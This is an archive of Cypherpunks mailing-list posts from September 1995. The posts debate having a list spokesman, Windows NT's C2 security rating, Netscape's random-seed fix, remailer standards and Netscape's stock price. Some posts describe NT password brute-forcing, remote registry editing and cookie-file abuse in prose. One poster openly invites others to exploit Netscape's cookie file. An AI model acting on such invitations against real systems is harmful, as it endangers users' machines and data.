looking for catchy quotes, all the more so on video than in print. Text journalists can handle complex themes much better than video reporters can, for many and oft-discussed reasons. (Even more disgusting than this was a more recent appearance of a BBC film crew at a Cypherpunks meeting. They wanted to "stage" the news, to have the meeting discuss a 2-year-old topic, because that's what their script called for. I got up and left, as did several other people. I haven't seen this BBC show, but I gather from a URL that this is the one that has "performance art" examples of crypto....) Any "spokesman" needs to be easily accessible when they need a "filler quote," or a "reaction quote." However: 3. THERE IS NO SPOKESMAN, THERE IS NO CENTRAL OFFICE, THERE IS NO BOARD OF DIRECTORS! With no organization, no office, no coordination, we cannot "feed the media machine" the way it expects to be fed. Nor can we "elect" such folks. I didn't help start this list--not that this gives me more moral sway--in order that J. Random Volunteer will start speaking for "our beliefs" or will start explaining "our goals" and "our plans." Far better that journalists like Steven Levy and John Markoff subsribe to the list, or to condensations by people like Eric Blossom, and then deal directly with the experts in some area. Thus, on the latest Netscape flaw, they would contact Ray Cromwell directly, not deal with the press releases written by J. Random Volunteer. Anarchy is part of our charm. More importantly, part of our theme. Face it, we don't have a press office, we don't have staffing, and--most importantly--there is no one out there who speaks for me. A spokesman for the Cypherpunks is an oxymoron. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From harveyrj at vt.edu Tue Sep 26 09:10:56 1995 From: harveyrj at vt.edu (RJ Harvey) Date: Tue, 26 Sep 95 09:10:56 PDT Subject: Hack Microsoft? Message-ID: <9509261610.AA13583@toad.com> At 10:33 AM 9/26/95 EDT, Dan Bailey wrote: >On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote: > >> >> >> Microsoft recently got C2-security status approved for Windows NT by >>the National Computer Security Center, a division of the NSA. They >>are supposed to put systems through "laborious testing and review" before >> If Cypherpunks can find flaws that the NSA can't, or won't divulge, >>what does that say about their so-called COMSEC ability. >> >For fun ways to hack NT, check out http://www.somar.com/security.html. > Some of these are really laughable. You can use NT's LogonUser API >call to repeatedly guess passwords until you hit it, since NT offers >no way to limit number of login attempts. I don't believe that's correct; under User Manager, select the Account option under the Policies menu item; it lets you select whether to lock-out the account after a given number of invalid logon attempts, and to set the number. The main problem here is that by default, I don't believe the 'lock out' option is enabled (and thus, brute-force attempts at Guest or a similar account might indeed work). rj --------------------------------------------------------- R. J. Harvey email: harveyrj at vt.edu WWW for job analysis/personality: http://harvey.psyc.vt.edu/ PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt From mmarkley at microsoft.com Tue Sep 26 09:11:19 1995 From: mmarkley at microsoft.com (Mike Markley) Date: Tue, 26 Sep 95 09:11:19 PDT Subject: Hack Microsoft? Message-ID: <9509261711.AA01641@netmail2.microsoft.com> Dan Bailey writes: | There also is no way to stop remote users from modifying the | registry. *Any* user with an account can remotely dump and modify the | system registry. So in theory you can write a bruteforce program to | keep guessing until it gets a password, then modify the registry to | make the system to "interesting" things. The worst part of all this | is that the Registry is very poorly documented, MSoft must consider | most of that info "confidential." | Fortunately, when using NT's SMB services such as drive and file | sharing, passwords are never sent in the clear. Just make sure you | disable that "Guest" account.:) This is not entirely true. If I log in as 'guest' I cannot modify just any key in the registry. I can only modify the ones that I have permissions to change. Also if you know what you are doing you can set permissions on any key in the registry so that it can't be modified by just anyone. I can also modify the account permissions so that if a logon attempt fails, after a specified number of retries the account is locked and will not accept logons until the administrator unlocks the account. I'd recommend that you get a copy of Windows NT and the Windows NT Resource Kit, install it and play around with the security system before you make generalized statements about it. Mike. ===================================================== Mike Markley I'm not a Microsoft spokesperson. All opinions expressed here are mine. ===================================================== From tomw at orac.engr.sgi.com Tue Sep 26 09:24:33 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Tue, 26 Sep 95 09:24:33 PDT Subject: More on "Entropy" Message-ID: <199509261622.JAA02167@orac.engr.sgi.com> In article , David Van Wie writes: > David Van Wie wrote: >>> The entropy E is defined by the sum across n states of -P_i log_2(P_i), > Timothy C. May wrote: >> Hah! Another physicist converted to the information-theoretic view of > entropy! > Indeed. I was able to track down the literature, and it is most > interesting. I am still a little bit skeptical of the "superset including > thermodynamic entropy" school of thought, but I haven't finished reading all > of the materials yet! Clearly, the IT "version" of entropy is a well > defined and useful thing.... We used this formulation of entropy in Statistical Mechanics. It's especially useful in Quantum Thermo where you can actually enumerate all of the states instead of relying on probabilistic arguments. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From mkj at october.ducktown.org Tue Sep 26 09:44:50 1995 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Tue, 26 Sep 95 09:44:50 PDT Subject: Golden Coy Freeh Message-ID: <199509261605.AA00814@october.ducktown.org> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From mkj at october.ducktown.org Tue Sep 26 09:44:55 1995 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Tue, 26 Sep 95 09:44:55 PDT Subject: cypherpunks press releases/contact list Message-ID: <199509261623.AA00939@october.ducktown.org> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From tcmay at got.net Tue Sep 26 09:53:02 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 26 Sep 95 09:53:02 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: At 6:52 PM 9/25/95, Jon Lasser wrote: >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of >a student like myself, and probably most others, if it's still anything >like it was at the 1.0 release) that mostpeople have had zero opportunity >to examine the program, let alone really have time to play with it? I've never even _seen_ a copy of Notes running on any machine, nor do I know directly of _any_ of my colleagues who has. (Not saying nobody has, of course, just that I can't find anyone I know well who has.) I've been following the news on Notes for at least several years, even to the point of buying some Lotus stock several years ago on the strength of what I had read about Notes. (Alas, I sold it soon thereafter, before a run-up in price.) My point? Notes is nearly invisible in the non-corporate community I now hang out in. Who knows what weaknesses or bugs it has in it. Folks on our list probably don't have much familiarity with it. My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM overpaid for Lotus, that the notion of Notes becoming the universal collaboration/communication option is flawed. (I've been saying for a while that the Web serves that purpose better, and that Web browsers will likely edge out Notes. Apparently I was hardly prescient, as Netscape recently bought Collabra, which is pushing that point exactly.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rah at shipwright.com Tue Sep 26 10:09:52 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Sep 95 10:09:52 PDT Subject: SpokesPunking... Message-ID: At 3:03 AM 9/26/95, Craig Hubley wrote: >"Consensus on cypherpunks seems to be that 40 bit encryption is not viable > for commercial applications, and that Netscape seems to have taken less > than due care to choose an appropriate random seed for its session keys." No offense offered Craig, 'cause I like reading your stuff here, but the concensus opinion on cypherpunks is "We don' need no steeenking spokespunk!". It seems to me that you can say that without any title, and the mouthier amongst us will be tapped for quotes as individuals anyway... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From nelson at santafe.edu Tue Sep 26 10:33:53 1995 From: nelson at santafe.edu (Nelson Minar) Date: Tue, 26 Sep 95 10:33:53 PDT Subject: Security Update news release In-Reply-To: <199509260306.XAA20157@book.hks.net> Message-ID: <9509261732.AA08810@sfi.santafe.edu> >Do the new versions use PGP's randseed.bin? If Netscape even only looks at >data used to keep PGP secure, Netscape will be banned from my computer >and every computer I am responsible for. -- For good. This is the second person who has expressed this sentiment. I don't understand it. If you believe that the possibility of randseed.bin getting out is dangerous, then why do you leave it online? Do you really trust every piece of software you run, every piece of software that can possibly access your machine over the net, to not look at that file? From patrick at Verity.COM Tue Sep 26 10:37:13 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Tue, 26 Sep 95 10:37:13 PDT Subject: Security Update news release Message-ID: <9509261733.AA22080@cantina.verity.com> > > > > Here is the press release we put out this morning regarding the fix > >for RNG seed and stack overflow problems. > > Do the new versions use PGP's randseed.bin? If Netscape even only looks at > data used to keep PGP secure, Netscape will be banned from my computer > and every computer I am responsible for. -- For good. That doesn't quite make sense. Netscape reading randseed.bin can have no effect on the security of PGP. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From jim at acm.org Tue Sep 26 10:41:41 1995 From: jim at acm.org (Jim Gillogly) Date: Tue, 26 Sep 95 10:41:41 PDT Subject: Easter Eggs In-Reply-To: <9509261421.AA00130@cfdevx1.lehman.com> Message-ID: <199509261614.JAA15814@mycroft.rand.org> > In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim > Gillogly) wrote: > >I'm nervous enough about all the Easter Eggs that have been reported in > >Netscape, like the secret keystroke shortcut to get to Fishcam, or the > >different behavior it exhibits when it finds a certain obscurely-named > >directory at the top level. > Rick Busdiecker writes: > Personally, I like the Easter Eggs in Netscape and other software > products. I don't know if there's an consensus definition of `Easter > Egg', but my working definition is something like ``An unpublicized, > unharmful, preferably amusing, feature for which interested users may > hunt.'' I think that such things add some fun for curious users and I enjoy Easter Eggs in general, and I agree that a program with fun stuff like this in it gives one a warm fuzzy feeling about the relaxed management style at the company that produces it. On the other hand, of all kinds of mass market software, network-aware software needs to have the most trust from the users, because it alone has the capability of passing information out of your machine. My preference is always to have source code available for security-critical functions so that I can verify that it's not only doing what I want, but also doing nothing that I don't want. For a program like Netscape it doesn't make sense to supply source code, of course, and the Easter Eggs already provide some evidence that it's doing something that I didn't "buy" (assuming I've bought it, of course). >From there it's a short step to the questions "What else is it doing that I didn't pay for? Reading my PGP key generation environment? Interesting. What else?" > I didn't know about the FishCam Easter Egg, but I know that Netscape Ctrl-alt-f if you're a PC type, or Ctrl-meta-f if you're on a Sun; I'm calling the diamond to the left of the space bar a "meta". Jim Gillogly Hevensday, 5 Winterfilth S.R. 1995, 16:14 From futplex at pseudonym.com Tue Sep 26 11:06:56 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 26 Sep 95 11:06:56 PDT Subject: getting netscape to support the remailers In-Reply-To: <199509260239.TAA14898@infinity.c2.org> Message-ID: <9509261805.AA22239@cs.umass.edu> sameer writes: > I think that in order to get netscape to support the remailers > the remailers will have to: > > A) Support S/MIME > B) Have a documented protocol, MIME-related > > Did Ray Cromwell do some work towards MIMEifiying the > remailers? My impression of his work back when he posted was that it > trusted the remailers too much, but perhaps my memory is flawed-- in > any case his work may be helpful towards developing a remailer > standard, which could then help get support incorporated into > MIME agents. Here's something I sent to the list on July 24 which may be of interest: ---- begin included message ---- Perry Metzger writes: >>> It would be very, very good if everyone doing secure mail systems of >>> one sort or another (including PGP integrated mail packages and >>> remailers) slowly moved forward to the formats described in this >>> document, which is now a proposed internet standard... The IESG writes: > The IESG has approved the following two Internet-Drafts as Proposed > Standards: > > 1. MIME Object Security Services > 2. Security Multiparts for MIME: Multipart/Signed and > Multipart/Encrypted > > > These documents are the product of the Privacy-Enhanced Electronic Mail > Working Group. The IESG contact person is Jeffrey Schiller. > > > Technical Summary > > These documents describe a general framework for security within MIME > (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering > Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt). > Support is provided for digital signatures on MIME objects (both simple > and compound) as well as for confidentiality provided through data > encryption. I've spent some time reading these proposed standards, along with parts of RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to get a sanity check and comments before I consider proceeding with submission to the IETF Media Types review list, etc. I propose a new Media Type subtype for Mixmaster remailer packets, "application/mixmaster". (For the purposes of this message, "Mixmaster remailer packet" refers to a packet generated by a Mixmaster server or client, and intended for transmission to a Mixmaster server. It does *not* cover messages generated by a Mixmaster server that are intended for an ultimate message recipient.) This is intended to be an experimental protocol for use in the control part of a multipart/encrypted message. There is one required parameter, "version", meant to indicate the version number of the originating Mixmaster software. In addition, one optional parameter, "key-id", may be included. If present, this parameter would indicate the single line key prefix/ID of the public Mix key used to encrypt (at the outermost layer) the contents of the application/mixmaster part. This might be used to thoroughly disambiguate decryption options in the event that the recipient server has more than one currently active public Mix keys. The application/mixmaster (control) part of the multipart/encrypted message would contain the padded list of Mixmaster server hop headers, superencrypted at the outermost layer with a public Mix key (presumably, one belonging to the recipient server). A single decryption of these headers should reveal the IDEA key used to superencrypt, at the outermost layer, the body part of the multipart/encrypted message. The application/octet-stream (body) part of the multipart/encrypted message would contain the list of ultimate recipients of the remailed message, the text of the message itself, and any additional processing instructions to the final Mix server. The latter, body part of the multipart/encrypted message shall have been encrypted by the originator using the IDEA key specified in the former, control part. The contents of the application/mixmaster part should be encoded in accordance with the standards for application/octet-stream. (NB: this amounts to a division of the extant Mixmaster packet format roughly into a control section and a body ("payload") section.) Comments ? -Futplex ---- end included message ---- -Futplex From stewarts at ix.netcom.com Tue Sep 26 11:58:55 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 26 Sep 95 11:58:55 PDT Subject: Hack Microsoft NT C2 Rating? Message-ID: <199509261856.LAA24022@ix6.ix.netcom.com> At 07:27 AM 9/26/95 -0700, todd at lgt.com (Todd Glassey) replied to Ray: >>So, if one can find bugs in NT's security, one can >>toss a little more egg on the NSA's face and the sham that part of >>their activies to *help* to secure american computers. A simple >>violation of NT's C2 status would be to demostrate a flaw in it's >>memory protection implementation. One of the bigger cracks on VMS was after it got its C2 rating; a strong system doesn't do you much good if you don't change the default passwords for the SYSTEM and FIELD service accounts :-) I'm more surprised by the rating since the Orange Book is basically for non-networked systems; Red Book rating is _much_ harder, unless the NSA's taking a different view of trustability of software encryption for authentication purposes than they used to. >As per NT's orange book C2 Rating... C2 is about the lowest level of Secure >that you can get. In fact I personally am unimpressed, rather it is a box >on an RFQ that gets checked. Very few people run C anything sites in reality. A C2 rating says that most of the obvious bugs have been found, access to the system and individual files requires authentication, and you can do an audit trail to find out who accessed what data when. Ignoring networks, that's not too bad. But, yeah, one of the big reasons for C2 rating is that government RFPs generally require C2 security, at least for military or sensitive non-military purchases. B-level ratings give you multi-level security, so you can run SECRET and CONFIDENTIAL on the same box; it's not a very useful security model for non-military applications, but does let you do a better-trusted job of system integrity. >IMHO - Military sites passing real classified data usually are not run on >anything as low as C2. If you want a secure os, look at the Harris Computer >Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). Hah. Maybe it's changed since I was working with the AT&T System V/MLS folks, but the vast majority of classified processing back then was done on unrated or C2 systems running System High - everybody's cleared, and the boxes with the classified stuff aren't connected to the outside except by limited sneakernet. You can get a _lot_ of security by keeping your computers in locked rooms, and the average PC of those days could fit in a big safe at night even if it couldn't fit in a locked file cabinet. (And floppy disks or external shoeboxes were easy to lock up.) Dan B. wrote >For fun ways to hack NT, check out http://www.somar.com/security.html. >Some of these are really laughable. You can use NT's LogonUser API >call to repeatedly guess passwords until you hit it, since NT offers >no way to limit number of login attempts. That's the kind of thing that would get changed for a C2 version, just as the Unix login program had to be souped up for C2 and B1. Even adding a constant delay, or an increasing delay after bad attempts, is a good start for systems like that. (It turns out that logging user names on bad attempts has to be done carefully to avoid increasing risk - if users get out of sync on typeahead when entering their login and password, you can end up logging passwords, which was especially bad when that sort of data got printed on the paper console...) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 26 12:41:15 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 26 Sep 95 12:41:15 PDT Subject: Security Update news release Message-ID: <199509261941.MAA02266@ix6.ix.netcom.com> >>Do the new versions use PGP's randseed.bin? If Netscape even only looks at >>data used to keep PGP secure, Netscape will be banned from my computer >>and every computer I am responsible for. -- For good. > >This is the second person who has expressed this sentiment. I don't >understand it. If you believe that the possibility of randseed.bin >getting out is dangerous, then why do you leave it online? Do you >really trust every piece of software you run, every piece of software >that can possibly access your machine over the net, to not look at >that file? It makes a little bit of sense - I'm not aware of any software, other than PGP and now Netscape, that _explicitly_ goes after randseed.bin, though of course just about anything can try. Assuming the code is inspectable (which it currently is), if I can see that all it's going to do with the file is crunch it into MD5 along with a bunch of other stuff, I'm not too worried, even though it is stealing slack(entropy) from PGP. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From hallam at w3.org Tue Sep 26 12:41:58 1995 From: hallam at w3.org (Phillip M. Hallam-Baker) Date: Tue, 26 Sep 95 12:41:58 PDT Subject: First Payments WG Meeting Announcement Message-ID: <9509261941.AA17884@www18.w3.org> The World Wide Web Consortium is holding a Workshop on payments. The workshop is intended to be a small, technically oriented meeting of its payments working group. Although it is a members only event I am willing to listen to special pleading, alternatively companies may wish to join the consortium at our extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for details. -- Phillip M. Hallam-Baker Not speaking for anoyone else hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! ANNOUNCE: First W3C Payments WG Meeting, October 11 ---------------------------------------------------------------------------- What: 1st W3C Payment WG Meeting Where: MIT EECS, Grier Room 34-401 (subject to change) When: Wednesday October 11, 9am - 5pm Who: W3C Member Representatives ONLY URL: First W3C Payments WG Meeting W3C is making progress on supporting electronic payments on the web. This WG Meeting has been called to foster discussion and feedback between W3C and its members. Discussion will focus on proposals to the W3C for payment protocols, interfaces, and e-commerce support. The agenda for the electronic payment workshop is still being settled. At the current time we have confirmed presentations by VISA, IBM, W3C, and the Financial Services Technical Consortium (FSTC). Additional invitations have been issued, and suggestions for additional presentations would be welcome. Contact Phillip Hallam-Baker (hallam at w3.org) or Jim Miller (JMiller at w3.org) with suggestions. There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th. Contact Rohit Khare for details (khare at w3.org) To RSVP for the Payments WG Meeting, email the coordinator, Phillip Hallam-Baker (hallam at w3.org) or call 617/258-5967 by 5 October. This workshop is aimed at technologists; please include a brief description of any relevant payments work you or your organization are involved in. This is a preliminary announcement of the date and time only. We have arranged for hotel rooms at the Kendall Square Mariott. To qualify for the MIT discount, notify Susan Hardy (susan at w3.org). For a review of the Consortium's plans, see W3C's report on Electronic Payment Schemes and the Third W3C Security Workshop. From vince at offshore.com.ai Tue Sep 26 12:42:27 1995 From: vince at offshore.com.ai (Vincent Cate) Date: Tue, 26 Sep 95 12:42:27 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: <199509250402.OAA17312@sweeney.cs.monash.edu.au> Message-ID: While it is true that on some versions of X you can watch mouse events on other peoples computers, it is also true that on some versions you can watch keyboard input. At CMU Bennet Yee wrote a program to get peoples passwords as they typed them in using X's poor/non-existent security back then. This was before xauth. I still think that the low bits of the mouses X and Y positions as the user moves the mouse around the screen are a very good source of random bits for Netscape. -- Vince From andrew_loewenstern at il.us.swissbank.com Tue Sep 26 12:56:19 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 26 Sep 95 12:56:19 PDT Subject: getting netscape to support the remailers Message-ID: <9509261951.AA01873@ch1d157nwk> > I started thinking about what it would take to get Netscape > to support sending mail through the remailers, after having > read the S/MIME specs which Netscape 2.0 is apparently going to > support. Perhaps with enough browbeating Netscape 3.0 will support > the remailers. Netscape doesn't need to support remailers explicitly since Netscape will be supporting Java. I think a remailer client is within Java's capabilities... Anyone disagree? andrew From alano at teleport.com Tue Sep 26 12:59:40 1995 From: alano at teleport.com (Alan Olsen) Date: Tue, 26 Sep 95 12:59:40 PDT Subject: [NOISE] Re: Easter Eggs Message-ID: <199509261959.MAA28501@desiree.teleport.com> At 10:21 AM 9/26/95 -0400, you wrote: >I also think that in Netscape their existance is an >indication that the managment at Netscape is a bit less uptight than >management at some other places. Depends on the department. They have at least one manager at Netscape with a permenent case of high blood preasure. (He happens to be in charge of the support department.) >I didn't know about the FishCam Easter Egg, but I know that Netscape >has a couple of Easter Eggs related to the activity indicator in the >top right of the display. Typically this is the Big N logo with >animated meteors, etc. flying by when the window is active. One >Easter Egg temporarily turns this into a compass which spins to >indicate activity. Another causes the animation to show a dragon >(Mozilla) breathing fire for the remainder of the session. I won't >spoil your fun by telling how to find them. If he is not running X Windows, he is going to be searching along time for the Compass easter egg. You also need X windows to find the Mozilla animated icon hack on Jammie Zawinski's page. Which easter eggs that are available is dependant on which client you are running. obNetscapeHack: There is a feature called a "cookie file" in Netscape that is ripe for exploitation as a security leak. If you are using a Netscape server (and you may not even need that), you can feed all sorts of information into it without the user's knowlege. I have heard of one page that overloads the cookie file until the machine runs out of drive space. I am sure that there are other exploitable holes there... Any takers? | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From sameer at c2.org Tue Sep 26 13:02:28 1995 From: sameer at c2.org (sameer) Date: Tue, 26 Sep 95 13:02:28 PDT Subject: getting netscape to support the remailers In-Reply-To: <9509261951.AA01873@ch1d157nwk> Message-ID: <199509261957.MAA20143@infinity.c2.org> That was what I was thinking as well. I am confused by Netscape's java support though.. I haven't seen very many details. Is netscape going to only support applets or can you add stuff to the runtime as well? In order to use jcrypt one needs access to add stuff to the runtime I beleive. > > > I started thinking about what it would take to get Netscape > > to support sending mail through the remailers, after having > > read the S/MIME specs which Netscape 2.0 is apparently going to > > support. Perhaps with enough browbeating Netscape 3.0 will support > > the remailers. > > Netscape doesn't need to support remailers explicitly since Netscape will be > supporting Java. I think a remailer client is within Java's capabilities... > Anyone disagree? > > andrew > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jya at pipeline.com Tue Sep 26 13:03:05 1995 From: jya at pipeline.com (John Young) Date: Tue, 26 Sep 95 13:03:05 PDT Subject: IBE_dam Message-ID: <199509262002.QAA17680@pipe1.nyc.pipeline.com> 9-26-95. W$Japer: "On-Line Service to Assist Global Trade." A group of multinational companies is expected to unveil today an on-line service to businesses to engage in international trade. Dubbed IBEX, it is a joint effort of AT&T, Dun & Bradstreet, General Electric and the U.S. Chamber of Commerce to let businesses use on-line traffic to line up suppliers, negotiate contracts, make and receive bids, and arrange the delivery of goods and services around the world. IBEX expects the backing of Chase Manhattan, Microsoft, DEC and Simon & Schuster. The IBEX software allows companies to sign on and submit a request for goods or services, which is posted anonymously. The request could be styled using an array of categories offered by the service, including location, product category, payment and shipping terms. The customer would then receive bids from businesses hoping to land the contract. Once a bid is chosen, the identities of the businesses are disclosed and negotiations begin. IBEX allows them to attach documents such as confidentiality agreements, contracts and purchase orders. IBE_dam (5 kb) From tomw at orac.engr.sgi.com Tue Sep 26 13:13:53 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Tue, 26 Sep 95 13:13:53 PDT Subject: Security Update news release In-Reply-To: Message-ID: <199509261955.MAA02671@orac.engr.sgi.com> In article , shamrock at netcom.com (Lucky Green) writes: > Do the new versions use PGP's randseed.bin? If Netscape even only looks at > data used to keep PGP secure, Netscape will be banned from my computer > and every computer I am responsible for. -- For good. This is ludicrous. You couldn't compromise PGP's security even if you posted the contents of randseed.bin to the net. It's contents are carefully sanitized before it's saved to disk and before it's used. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From pays at gctech.edelweb.fr Tue Sep 26 13:40:46 1995 From: pays at gctech.edelweb.fr (Paul-Andre Pays) Date: Tue, 26 Sep 95 13:40:46 PDT Subject: First Payments WG Meeting Announcement Message-ID: At 15:41 26/09/95, Phillip M. Hallam-Baker wrote: >The World Wide Web Consortium is holding a Workshop on payments. The workshop >is intended to be a small, technically oriented meeting of its payments working >group. Although it is a members only event I am willing to listen to special >pleading, alternatively companies may wish to join the consortium at our >extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for >details. > >-- >Phillip M. Hallam-Baker Not speaking for anoyone else >hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html >Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! > >ANNOUNCE: First W3C Payments WG Meeting, October 11 > >---------------------------------------------------------------------------- > >What: 1st W3C Payment WG Meeting > >Where: MIT EECS, Grier Room 34-401 (subject to change) > >When: Wednesday October 11, 9am - 5pm > All that is extremely fine and an awaited initiative BUT for one point the EXTREMELY SHORT DELAY and notification!!!!!! Our company is just in the "joining the consortium" process, especially because we were expecting such an event. However, to be able to catch a flight and spend a couple of days at MIT within less than a fortnight is another matter. I don't yet know if we will able to attend, and we really would hate to be unable to attend and participate. Thus I would urge the Web Consortium to consider postponing this meeting for at least 2 or 4 weeks so that any interested party is able to decently cancel other commitments and get prepared for the meeting. If W3C is really interested in attracting all interested party, it would be fair as I suspect we are not the only ones with Please let me know as soon as if this is possible or if I must as soon as possible try to change my agenda. regards, -- PAP _________________________________________________________________________ PAP: paul-andre.pays at gctech.edelWeb.fr tel: +33 1 34 52 00 88 fax: +33 1 34 52 25 26 GC Tech "The Globe Online and Globe ID Technology Company" http://www.globeonline.fr/ http://www.gctech.fr/ From hallam at w3.org Tue Sep 26 13:46:55 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 26 Sep 95 13:46:55 PDT Subject: Hack Microsoft? In-Reply-To: <199509260404.AAA14297@clark.net> Message-ID: <9509262046.AA18525@zorch.w3.org> > Microsoft recently got C2-security status approved for Windows NT by >the National Computer Security Center, a division of the NSA. They >are supposed to put systems through "laborious testing and review" before >they approve C2. Well yes and no, C2 is not a particularly high security rating. It is also a fairly obsolete set of requirements. So if anyone is to claim a breach of a C2 system it had better be one within the C2 assurances, not something that is only covered in the B series criteria. What really matters is the combined criteria which should have/would have emerged from NIST had the issue of harmonising the US/Canadian criteria with the European ones turned up. As a cypherpunks aside we reviewed the orange book criteria in a reading group here at MIT a few months back. One point that was made was that Orange Book does not consider cryptographic security systems which was generally considered a disappointment. Obviously Windows NT is "fair game" for analysis. Remember however that it is an established operating system and that there are many people who rely on it. I think that if people want to go down that route they should start by establishing a contacts with CERT and Microsoft in order to make sure that people whose businesses depend on the security of their O/S are not compromised. You may well find that Microsoft is willing to give you free copies of WNT to do this type of work on. I think that this would be a really good project. The more independent analysis of an operating system that takes place the more confidence people can place in it. Windows NT is in many ways a descendent of VMS which has a very good security record. There is no reason why Windows NT should not mature to that level of security. It was built with security in mind after all, unlike UNIX sitation security was never more than an afterthought and often merely wishfull thinking. There are an awful lot of WNT seats out there already. I expect them to outnumber UNIX very soon. The only thing that is holding it back is the relatively small size of the userbase compared to windows and the resources required to run it. WNT requires similar CPU and memory to UNIX which is hardly suprising since it is doing very much the same thing. I would suggest however that the project is structured and coordinated in some fashion. Someone should keep a list of security concerns that have been addressed and checked. That list should have some structure such as a division into the main risk categories (Authenticity, confidentiality, Service) so that people can get a feel for how thoroughly the space is being searched. Later on that list is likely to be one of the most valuable end results of such a project. Phill From jsimmons at goblin.punk.net Tue Sep 26 13:49:34 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Tue, 26 Sep 95 13:49:34 PDT Subject: Netscape Stock Prices Message-ID: <199509262045.NAA05438@goblin.punk.net> Here's the history of Netscape's stock price to date, with the dates of some Cypherpunk exploits, the Wall Street Journal Articles about them, and major Netscape press releases. Date High Low Close Volume 950809 75.000 53.750 55.500 3851.8 950810 56.500 51.375 51.375 2795.9 950811 53.000 48.750 51.500 1907.4 950814 51.750 50.250 51.250 530.9 950815 55.250 51.250 54.625 1040.6 Damien's Crack - AT&T deal 950816 56.500 55.250 55.625 997.6 Developer's Partnership announced 950817 55.250 52.500 54.875 562.5 WSJ article re: Damien 950818 55.250 52.250 52.625 409.5 950821 52.750 51.000 51.000 290.0 950822 51.500 50.500 50.625 258.5 Win95 Navigator released 950823 53.500 50.500 52.000 414.2 950824 52.000 51.250 51.250 119.7 950825 52.000 51.250 51.250 89.2 950826 Brute Crack 950828 51.750 51.000 51.000 210.2 950829 51.250 46.750 48.250 1037.9 950830 48.500 46.000 46.625 319.3 950831 49.500 45.750 49.500 423.0 950901 49.500 47.750 48.750 164.4 950905 49.250 46.000 46.250 277.8 950906 49.500 47.250 48.750 351.9 950907 50.750 48.750 50.250 499.1 950908 51.000 50.000 50.250 147.6 950911 54.750 50.250 53.250 533.7 950912 54.500 51.000 52.250 211.5 950913 52.750 50.000 50.750 150.8 950914 51.250 50.250 50.250 79.9 950915 53.750 50.250 53.250 242.1 950917 Ian & Dave's Crack 950918 55.250 51.750 52.500 350.1 New Software Announced 950919 53.250 49.000 53.375 373.5 WSJ article re: Ian & Dave 950920 56.250 53.250 54.750 302.5 950921 59.125 54.250 58.750 436.9 Collabra Purchase Announced 950922 63.250 59.750 62.750 807.7 Ray's overflow bug 950925 69.000 62.250 67.000 684.0 WSJ article re: overflow 